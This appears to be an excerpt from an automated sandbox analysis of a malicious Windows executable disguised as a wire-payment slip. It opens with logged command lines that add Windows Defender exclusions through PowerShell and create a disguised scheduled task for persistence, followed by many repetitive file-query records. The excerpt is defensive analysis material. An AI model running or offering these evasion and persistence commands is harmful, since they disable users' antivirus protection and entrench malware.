Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Users\user\Desktop\Wire slip account payable.pif.exe "C:\Users\user\Desktop\Wire slip account payable.pif.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Users\user\Desktop\Wire slip account payable.pif.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
